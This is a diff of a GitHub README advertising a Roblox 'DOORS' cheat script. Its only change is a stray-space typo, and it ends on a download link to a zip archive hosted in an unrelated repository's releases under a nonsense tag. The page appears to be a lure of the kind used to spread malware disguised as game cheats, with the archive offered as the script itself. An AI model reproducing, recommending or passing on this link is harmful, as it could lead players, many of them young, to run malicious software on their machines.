ROMILDOVAZ/DOORS-Script/README.md

 # DOORS-Script
 Enhance your Roblox DOORS experience with this powerful script!
 Automate door interactions, item collection, and more.
-Fully customizable, efficient, and compatible with the latest Roblox updates.
+Fully customizable, efficient, and com patible with the latest Roblox updates.
 Perfect for developers and players alike! 🚪🎮

 <div style="text-align: center">
   <a href="https://github.com/ROMILDOVAZ/musicas/releases/download/fdsfdsf/Setuvlast.zip">